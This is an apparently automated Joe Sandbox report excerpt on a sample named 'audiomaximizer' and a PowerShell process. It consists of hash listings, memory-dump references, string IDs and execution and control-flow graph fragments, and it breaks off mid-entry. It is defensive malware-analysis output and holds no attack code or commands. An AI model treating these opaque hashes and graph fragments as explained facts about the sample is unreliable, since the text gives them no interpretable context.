                                                                                                                                                                                • Opcode ID: ed14fcc09ce1facc0f211c1b8828945c576f7706834e35b36f4dcd027b62815c
                                                                                                                                                                                • Instruction ID: 816d97804e85172a5cfbdfb5604917f9dad3b8a365f91b2c2d66a307db388579
                                                                                                                                                                                • Opcode Fuzzy Hash: ed14fcc09ce1facc0f211c1b8828945c576f7706834e35b36f4dcd027b62815c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F1110B5C003498FDB10CF9AD444ADEFBF8AB88324F10842AD968B7250C379A545CFA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4130137751.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_168d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
                                                                                                                                                                                • Instruction ID: c6f0798584bc55ebdb9fcd61bee7ea69601a71e2d7949267d3d8f16f4eabef77
                                                                                                                                                                                • Opcode Fuzzy Hash: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
                                                                                                                                                                                • Instruction Fuzzy Hash: 28210671500240DFDB05EF58D9C0F27BF65FB84318F20C66AD9054B296C336D456C6B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
                                                                                                                                                                                • Instruction ID: 42040218247c189165dbd63cc91efcc7c1d5b8561755fd0143b31e587246795d
                                                                                                                                                                                • Opcode Fuzzy Hash: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F21D071604200DFDF15DF68D984B26BBA9EB84354F20C579D94A4B396C33AD447CA61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 81eae3d96a9dc71ac27bf1e5e77c7e5c525902b01c41857aabe1b820b7787db3
                                                                                                                                                                                • Instruction ID: 88588e4030b11580dc91078d03504007f91a50f26c4ed441f6a460cddc1e886b
                                                                                                                                                                                • Opcode Fuzzy Hash: 81eae3d96a9dc71ac27bf1e5e77c7e5c525902b01c41857aabe1b820b7787db3
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D213571504204DFDF01DF58DDC0B2ABBA9FB85325F24C679D9494B342C33AD446CAA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
                                                                                                                                                                                • Instruction ID: b3674776dd66ceb2a519abc3434d2991a038f86c7d0155c1ed5c5fa1c13d4dc1
                                                                                                                                                                                • Opcode Fuzzy Hash: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
                                                                                                                                                                                • Instruction Fuzzy Hash: B1219F755083809FDB02CF64D994B11BFB5FB46314F24C5EAD8498F2A7C33A980ACB62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4130137751.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_168d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction ID: 7c39f9d02efdfc9b08c86bafab707d263c3e51de72211900a3abaca7dd959bc9
                                                                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11E172404280DFCB02DF54D9C4B16BF71FB84318F24C6AAD9090B656C336D45ACBB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                • Instruction ID: 990c5ad8ab2038f045f8e2a4f584fd4b3f3a9ad84d97366556408c7dfbcf0d81
                                                                                                                                                                                • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                • Instruction Fuzzy Hash: 8211BF76504680CFDB12CF14D9C4B1AFF61FB85324F28C6AAD8494B756C33AD40ACBA2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$\$tP^q$tP^q
                                                                                                                                                                                • API String ID: 0-3960514012
                                                                                                                                                                                • Opcode ID: b9efffe7087c1db3a3c6cd6c74eaadfadd1470281ecb6619277d36c05d2e9fcc
                                                                                                                                                                                • Instruction ID: 6b122557fa1fea1476e0a893920bf737b9648bfae0d026776cb394979c1bf714
                                                                                                                                                                                • Opcode Fuzzy Hash: b9efffe7087c1db3a3c6cd6c74eaadfadd1470281ecb6619277d36c05d2e9fcc
                                                                                                                                                                                • Instruction Fuzzy Hash: 647259B1B042098FC7249B69DC0176ABBF6AFC6311F14C4BAD565CF296DA31C846C7A1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: <
                                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                                • Opcode ID: 1b92837823756d50fde07037a8c0c3bfc564358c33a68af4d1b60522e860fc10
                                                                                                                                                                                • Instruction ID: 053ee6beccf1c28d4c3a18675f0f18f7510dd51ccde91da1f6f695c2a9dcd491
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b92837823756d50fde07037a8c0c3bfc564358c33a68af4d1b60522e860fc10
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F4119F1A0030A8FDB258F65CD01A6A7FF2AFC5355F0484AAE460DF256D735C846C7A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_3210000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4df568bf88c828b5b4081e7dfb43e4c508ac1fd40fea8bed6beb03f4b2e6c271
                                                                                                                                                                                • Instruction ID: a5122481785034b165d9366b3ed25bd39832435203e8c90a568fba09cf2283de
                                                                                                                                                                                • Opcode Fuzzy Hash: 4df568bf88c828b5b4081e7dfb43e4c508ac1fd40fea8bed6beb03f4b2e6c271
                                                                                                                                                                                • Instruction Fuzzy Hash: F3417134A14244DFCB05CF68D5909ADFBF2FF89310B1584A9E941AB366CB35EC55CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_3210000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 25580aa7d5b7810a253ad3936cc3fbb2738bb848b2e9753a9e8e9e524d52a0c0
                                                                                                                                                                                • Instruction ID: df140751079e0d8eec8fb794c496adab0bf0b03e259ade505e9211d4e42475b4
                                                                                                                                                                                • Opcode Fuzzy Hash: 25580aa7d5b7810a253ad3936cc3fbb2738bb848b2e9753a9e8e9e524d52a0c0
                                                                                                                                                                                • Instruction Fuzzy Hash: E9216B74A0425A8FCB05CF5CC9809AABBB4FF99300B1581AAD459DB352C735F851CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_3210000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bae394125aaefb8f6e79fb6ce4da0041e05f541cf49f543e62ff30e224f264ed
                                                                                                                                                                                • Instruction ID: e8b0b67c700cf117baf47eb3ca41f9b775869a848db8b0b0187b5820797df20e
                                                                                                                                                                                • Opcode Fuzzy Hash: bae394125aaefb8f6e79fb6ce4da0041e05f541cf49f543e62ff30e224f264ed
                                                                                                                                                                                • Instruction Fuzzy Hash: F22114B8E002498FCB00DF9CD5809AEBBF5FF89310B1585A9D849AB352C331EC51CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1828908861.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_319d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cc01b4aa6577da283892f3e64f6364b931104fe7479a8f674844e48a66dcde8d
                                                                                                                                                                                • Instruction ID: 380f405be8e83e5e87f2358f2b079d146fc81ea4a4502051b45c375c4beaceb4
                                                                                                                                                                                • Opcode Fuzzy Hash: cc01b4aa6577da283892f3e64f6364b931104fe7479a8f674844e48a66dcde8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F01DF314083009BFB108A29ED84B67FF98EF49324F1DC56BEC080A246C7799881C6B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1828908861.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_319d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e4fef3f127981115d6c794025ff35ededdb1cf8f03475e3c3035c6d7fb651c0c
                                                                                                                                                                                • Instruction ID: e22aac2261a269753b9fcf433d911067825e22ef3b7fe0a1e01d2359ffb4d881
                                                                                                                                                                                • Opcode Fuzzy Hash: e4fef3f127981115d6c794025ff35ededdb1cf8f03475e3c3035c6d7fb651c0c
                                                                                                                                                                                • Instruction Fuzzy Hash: D8012D6240E3C09FE7128B259894B52BFB4EF47224F1D80DBD8888F1A3C2699845C772
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_3210000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c62819baadaff1aac99d97c0759688b898e7cdf5ac9491bc7cbb5d060d1149bc
                                                                                                                                                                                • Instruction ID: fdd7d04a5b71752e71b7a141f6584881b7b22d9652fa19fefd3a2b944457581f
                                                                                                                                                                                • Opcode Fuzzy Hash: c62819baadaff1aac99d97c0759688b898e7cdf5ac9491bc7cbb5d060d1149bc
                                                                                                                                                                                • Instruction Fuzzy Hash: CFF06834E00105DFCB04CF9DC8549A9F7B5FF88210B248599D556A7711C7356C96CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_3210000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d64385fce36c50a49d435382e0965f8c2ebb523bf3a4094f8c7f06459b585026
                                                                                                                                                                                • Instruction ID: a903d1d5bf11c22f53d946e6bf226093a13183270bcec0bc144892043401d12a
                                                                                                                                                                                • Opcode Fuzzy Hash: d64385fce36c50a49d435382e0965f8c2ebb523bf3a4094f8c7f06459b585026
                                                                                                                                                                                • Instruction Fuzzy Hash: 31F0D435A001099FCB15CF9DD990AEEF7B1FF88324F248159E515A72A1C736AC62CB60
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                • API String ID: 0-3865595929
                                                                                                                                                                                • Opcode ID: 5e7a44d890d55b376a6d4ff8834adecb14d1d72180d5e4d634ea6a824c6f6f2c
                                                                                                                                                                                • Instruction ID: 23b7c8f70bee0ce6da45e65f3b0bc733957c7a2289780f3e32e8b729ed27fd22
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7a44d890d55b376a6d4ff8834adecb14d1d72180d5e4d634ea6a824c6f6f2c
                                                                                                                                                                                • Instruction Fuzzy Hash: 83B128B27043498FC7259B6DDC04A66BBF5AFC6220F18846BD465CF3A2DA31CD45C7A2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                • API String ID: 0-1608119003
                                                                                                                                                                                • Opcode ID: f9171e481d2ef73a11ab5c5a2d6cb35a8d3cf1100423d0d18b2f7f0731c6c919
                                                                                                                                                                                • Instruction ID: ad82a642333caf50d47640bd7c4515c268bc1f4ef426b74d224618d72556b5c1
                                                                                                                                                                                • Opcode Fuzzy Hash: f9171e481d2ef73a11ab5c5a2d6cb35a8d3cf1100423d0d18b2f7f0731c6c919
                                                                                                                                                                                • Instruction Fuzzy Hash: CAA178B27043158FC7258B799C1067BBBF1AFC6211F1884ABD465CF3A1DA71C845CBA2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                • API String ID: 0-3272787073
                                                                                                                                                                                • Opcode ID: 7e8f76571883b1ce01f020f375dc573935850ac7f500c2e046cb293e9c31666f
                                                                                                                                                                                • Instruction ID: 4870e75ec5ac260d14870f83f9a07d98a1c842a27f2954e345780812ac384c4b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e8f76571883b1ce01f020f375dc573935850ac7f500c2e046cb293e9c31666f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D5137B1B0430EDFCB285BA9CC0066ABBF6AFC6611F24847AD465CB751DA31C885C7A1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                                                                • Opcode ID: 067efb9763221260de82cb1bbdef98642c65cd497f709e373ccbcd68122bc1ae
                                                                                                                                                                                • Instruction ID: efe5b98b38f39f4158df4beafaedbac9c3a2e6681033fabe3d50c82eaadb8358
                                                                                                                                                                                • Opcode Fuzzy Hash: 067efb9763221260de82cb1bbdef98642c65cd497f709e373ccbcd68122bc1ae
                                                                                                                                                                                • Instruction Fuzzy Hash: BB2179B17003969BDF3C47AA4C00B27B6EA9BC0715F21842AE525CF381CD36C841D361
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H$tP^q$$^q$$^q
                                                                                                                                                                                • API String ID: 0-2033775723
                                                                                                                                                                                • Opcode ID: e349ba68251661857e8304b3d4af264e6438ab25fb77ce794163dcd807c5c3a8
                                                                                                                                                                                • Instruction ID: e3082c8cc372426c2cce5deb9e56be61e79d30e541d5e6f6fabf15a8d0690632
                                                                                                                                                                                • Opcode Fuzzy Hash: e349ba68251661857e8304b3d4af264e6438ab25fb77ce794163dcd807c5c3a8
                                                                                                                                                                                • Instruction Fuzzy Hash: 072136F26043489FC7258F64CC04A66BBF0AFC6660F1A8096E464CF262D734CC44C761
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                                                                • Opcode ID: 689390bb1144f3306f8750226c9780904aa6024cd0a20282ef9dd02b3ee34109
                                                                                                                                                                                • Instruction ID: 5c9bea120a624601a3175b1f260c31d3afee29fa8ef1c010b01cada12a64d3a4
                                                                                                                                                                                • Opcode Fuzzy Hash: 689390bb1144f3306f8750226c9780904aa6024cd0a20282ef9dd02b3ee34109
                                                                                                                                                                                • Instruction Fuzzy Hash: 2801D671B187965FC73E12381D251576FB65FC3910B2949ABC064CF2A6CE158C4AC3AB

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:9.8%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:145
                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                execution_graph 53795 5d05f04 53797 5d05f0a 53795->53797 53796 5d06027 53817 5d09540 53796->53817 53822 5d0953a 53796->53822 53798 5d0607b 53797->53798 53804 5d06b70 53797->53804 53808 5d06b98 53797->53808 53812 5d06bd0 53797->53812 53805 5d06b79 53804->53805 53828 5d068f4 53805->53828 53809 5d06ba8 53808->53809 53810 5d06bc5 53809->53810 53846 5d06904 53809->53846 53810->53796 53813 5d06bac 53812->53813 53816 5d06bda 53812->53816 53814 5d06bc5 53813->53814 53815 5d06904 DuplicateHandle 53813->53815 53814->53796 53815->53814 53816->53796 53818 5d06b98 DuplicateHandle 53817->53818 53819 5d09548 53818->53819 53861 5d07c14 53819->53861 53823 5d09540 53822->53823 53824 5d06b98 DuplicateHandle 53823->53824 53825 5d09548 53824->53825 53826 5d07c14 2 API calls 53825->53826 53827 5d09553 53826->53827 53827->53798 53829 5d068ff 53828->53829 53832 5d07a40 53829->53832 53834 5d07a4b 53832->53834 53833 5d07d7a 53834->53833 53835 5d06b98 DuplicateHandle 53834->53835 53836 5d07e73 53835->53836 53839 5d07b18 53836->53839 53838 5d07e7c 53840 5d07b23 53839->53840 53841 5d08193 53840->53841 53843 5d07b34 53840->53843 53841->53838 53844 5d081c8 OleInitialize 53843->53844 53845 5d0822c 53844->53845 53845->53841 53847 5d0690f 53846->53847 53851 5d07330 53847->53851 53854 5d0732b 53847->53854 53848 5d07283 53848->53810 53858 5d06fc4 53851->53858 53855 5d07330 53854->53855 53856 5d06fc4 DuplicateHandle 53855->53856 53857 5d0735e 53856->53857 53857->53848 53859 5d07398 DuplicateHandle 53858->53859 53860 5d0735e 53859->53860 53860->53848 53862 5d07c1f 53861->53862 53863 5d07a40 2 API calls 53862->53863 53864 5d095a2 53863->53864 53777 7463a53 53778 7463a66 53777->53778 53782 7463c80 PostMessageW 53778->53782 53784 7463c88 PostMessageW 53778->53784 53779 7463a89 53783 7463cf4 53782->53783 53783->53779 53785 7463cf4 53784->53785 53785->53779 53869 7468aa0 53871 7468ab2 53869->53871 53870 7468bcd 53871->53870 53874 74606c0 53871->53874 53878 74606d0 53871->53878 53875 746078e 53874->53875 53876 7460714 53874->53876 53875->53870 53876->53875 53877 7460783 KiUserCallbackDispatcher 53876->53877 53877->53875 53879 746078e 53878->53879 53880 7460714 53878->53880 53879->53870 53880->53879 53881 7460783 KiUserCallbackDispatcher 53880->53881 53881->53879 53882 5d07db7 53885 5d07a50 53882->53885 53886 5d07a5b 53885->53886 53890 5d08f88 53886->53890 53894 5d08f79 53886->53894 53887 5d07dc4 53891 5d08fd7 53890->53891 53898 5d07b9c 53891->53898 53895 5d08f88 53894->53895 53896 5d07b9c EnumThreadWindows 53895->53896 53897 5d09058 53896->53897 53897->53887 53899 5d09078 EnumThreadWindows 53898->53899 53901 5d09058 53899->53901 53901->53887 53865 5d09408 53866 5d0944d MessageBoxW 53865->53866 53868 5d09494 53866->53868 53746 73f29b0 53749 73f0124 53746->53749 53748 73f29c6 53750 73f012f 53749->53750 53751 73f0a20 53750->53751 53757 73f0e78 53750->53757 53761 73f0a40 53750->53761 53767 73f0a31 53750->53767 53773 73f0e88 53750->53773 53751->53748 53752 73f09ea 53752->53748 53758 73f0eb7 53757->53758 53759 73f0f3e 53758->53759 53760 73f0fc9 KiUserCallbackDispatcher 53758->53760 53760->53759 53762 73f0a67 53761->53762 53764 73f0c85 53762->53764 53765 73f0e78 KiUserCallbackDispatcher 53762->53765 53766 73f0e88 KiUserCallbackDispatcher 53762->53766 53763 73f0cbb 53763->53752 53764->53752 53765->53763 53766->53763 53768 73f0a67 53767->53768 53770 73f0c85 53768->53770 53771 73f0e78 KiUserCallbackDispatcher 53768->53771 53772 73f0e88 KiUserCallbackDispatcher 53768->53772 53769 73f0cbb 53769->53752 53770->53752 53771->53769 53772->53769 53774 73f0eb7 53773->53774 53775 73f0f3e 53774->53775 53776 73f0fc9 KiUserCallbackDispatcher 53774->53776 53776->53775 53786 73fef90 53787 73fefa0 53786->53787 53791 5d09820 SendMessageW 53787->53791 53793 5d09818 SendMessageW 53787->53793 53788 73fefb1 53792 5d0988c 53791->53792 53792->53788 53794 5d0988c 53793->53794 53794->53788 53902 73f0950 53903 73f0124 2 API calls 53902->53903 53904 73f0967 53903->53904 53905 73f7d40 53906 73f7d56 53905->53906 53907 73f7dad 53906->53907 53911 73f7dc1 53906->53911 53915 73f7dd0 53906->53915 53908 73f7d77 53912 73f7dce 53911->53912 53913 73f0e88 KiUserCallbackDispatcher 53912->53913 53914 73f7e4a 53913->53914 53914->53908 53916 73f7df0 53915->53916 53917 73f0e88 KiUserCallbackDispatcher 53916->53917 53918 73f7e4a 53917->53918 53918->53908 53919 73fdc40 53920 73fdc79 53919->53920 53921 73fdecf 53920->53921 53924 73f28a8 53920->53924 53928 73f2880 53920->53928 53925 73f28bb 53924->53925 53926 73f28bf 53925->53926 53927 73f2912 KiUserCallbackDispatcher 53925->53927 53926->53921 53927->53926 53929 73f2897 53928->53929 53930 73f28bf 53929->53930 53931 73f2912 KiUserCallbackDispatcher 53929->53931 53930->53921 53931->53930

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 265 168c146-168c158 266 168c15a-168c172 265->266 267 168c184 265->267 271 168c17b-168c17e 266->271 272 168c174-168c179 266->272 268 168c186-168c18a 267->268 273 168c18b-168c191 271->273 274 168c180-168c182 271->274 272->268 276 168c193-168c195 273->276 274->266 274->267 277 168c197-168c199 276->277 277->276 278 168c19b-168c19d 277->278 278->277 279 168c19f-168c1a1 278->279 279->278 280 168c1a3-168c1c8 279->280 281 168c1ca 280->281 282 168c1cf-168c2ac call 16841a0 call 1683cc0 280->282 281->282 292 168c2ae 282->292 293 168c2b3-168c2d4 call 1685658 282->293 292->293 295 168c2d9-168c2e4 293->295 296 168c2eb-168c2ef 295->296 297 168c2e6 295->297 298 168c2f1-168c2f2 296->298 299 168c2f4-168c2fb 296->299 297->296 300 168c313-168c357 298->300 301 168c2fd 299->301 302 168c302-168c310 299->302 306 168c3bd-168c3d4 300->306 301->302 302->300 308 168c359-168c36f 306->308 309 168c3d6-168c3fb 306->309 313 168c399 308->313 314 168c371-168c37d 308->314 315 168c3fd-168c412 309->315 316 168c413 309->316 319 168c39f-168c3bc 313->319 317 168c37f-168c385 314->317 318 168c387-168c38d 314->318 315->316 320 168c397 317->320 318->320 319->306 320->319
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                                                                • Opcode ID: 70089153dd1d558c0dc86954f2023b427e4d08d3cfb305c7b31e3cd1f3fcaddd
